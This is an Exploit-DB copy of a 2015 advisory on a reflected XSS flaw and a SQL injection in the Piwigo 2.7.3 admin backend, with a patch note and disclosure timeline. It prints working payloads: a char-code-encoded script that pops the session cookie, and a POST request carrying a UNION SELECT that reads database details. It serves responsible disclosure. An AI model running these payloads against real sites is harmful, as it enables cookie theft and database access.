Piwigo 2.7.3 - Multiple Vulnerabilities

EDB-ID:

36127

CVE:


EDB Verified:

Author:

Steffen Rösemann

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-02-19

Vulnerable App: 
Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit-Example:

http://
{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:

http://{TARGET}/admin.php?page=history

The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":

Exploit-Example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 – found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 – release date of this security advisory [without technical
details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services